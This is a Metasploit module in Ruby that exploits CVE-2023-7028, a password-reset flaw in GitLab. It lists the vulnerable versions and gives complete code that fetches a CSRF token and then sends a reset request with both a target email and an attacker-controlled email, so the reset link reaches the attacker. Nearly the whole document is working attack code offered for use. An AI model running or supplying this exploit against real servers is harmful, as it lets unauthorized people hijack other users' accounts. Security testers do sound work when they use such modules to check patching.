GitLab Password Reset Account Takeover

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Auxiliary::Scanner  
include Msf::Exploit::Remote::HttpClient  
  
def initialize  
super(  
'Name' => 'GitLab Password Reset Account Takeover',  
'Description' => 'This module exploits an account-take-over vulnerability that allows users  
to take control of a gitlab account without user interaction.  
  
The vulnerability lies in the password reset functionality. Its possible to provide 2 emails  
and the reset code will be sent to both. It is therefore possible to provide the e-mail  
address of the target account as well as that of one we control, and to reset the password.  
  
2-factor authentication prevents this vulnerability from being exploitable. There is no  
discernable difference between a vulnerable and non-vulnerable server response.  
  
Vulnerable versions include:  
16.1 < 16.1.6,  
16.2 < 16.2.9,  
16.3 < 16.3.7,  
16.4 < 16.4.5,  
16.5 < 16.5.6,  
16.6 < 16.6.4,  
and 16.7 < 16.7.2.',  
'Author' => [  
'h00die', # msf module  
'asterion04' # discovery  
],  
'License' => MSF_LICENSE,  
'References' => [  
['CVE', '2023-7028'],  
['URL', 'https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/'],  
['URL', 'https://github.com/duy-31/CVE-2023-7028']  
],  
'DisclosureDate' => '2024-01-11',  
)  
  
register_options(  
[  
Opt::RPORT(80),  
OptString.new('TARGETEMAIL', [ true, 'The email address of the account to compromise' ]),  
OptString.new('MYEMAIL', [ true, 'An email address to also send the password reset email to' ]),  
OptString.new('TARGETURI', [true, 'The path to GitLab', '/'])  
]  
)  
end  
  
def run_host(_ip)  
vprint_status('Obtaining CSRF token')  
res = send_request_cgi(  
'method' => 'GET',  
'keep_cookies' => true,  
'uri' => normalize_uri(target_uri, 'users', 'sign_in')  
)  
  
fail_with(Failure::Unreachable, 'No response received') if res.nil?  
  
fail_with(Failure::UnexpectedReply, 'Unable to find CSRF token') unless res.body =~ %r{<meta name="csrf-token" content="([^"]+)" />}  
print_good("Received CSRF Token: #{::Regexp.last_match(1)}")  
vprint_status('Sending password reset request')  
email_field_equals = "#{CGI.escape('user[email][]')}="  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri, 'users', 'password'),  
'data' => [  
"#{email_field_equals}#{CGI.escape(datastore['TARGETEMAIL'])}",  
"#{email_field_equals}#{CGI.escape(datastore['MYEMAIL'])}",  
"authenticity_token=#{::Regexp.last_match(1)}"  
].join('&')  
)  
fail_with(Failure::Unreachable, 'No response received') if res.nil?  
  
if res.code == 302  
print_good("Sent, check #{datastore['MYEMAIL']} for a possible password reset link (failure is blind)")  
elsif res.code == 422 || res.body.include?('The change you requested was rejected.') # happened when I ran module 3 times within a minute or so  
print_bad('Request failed, server rejected. Try again later or a different user')  
else  
print_bad("Request failed, http code: #{res.code}")  
end  
end  
end  
`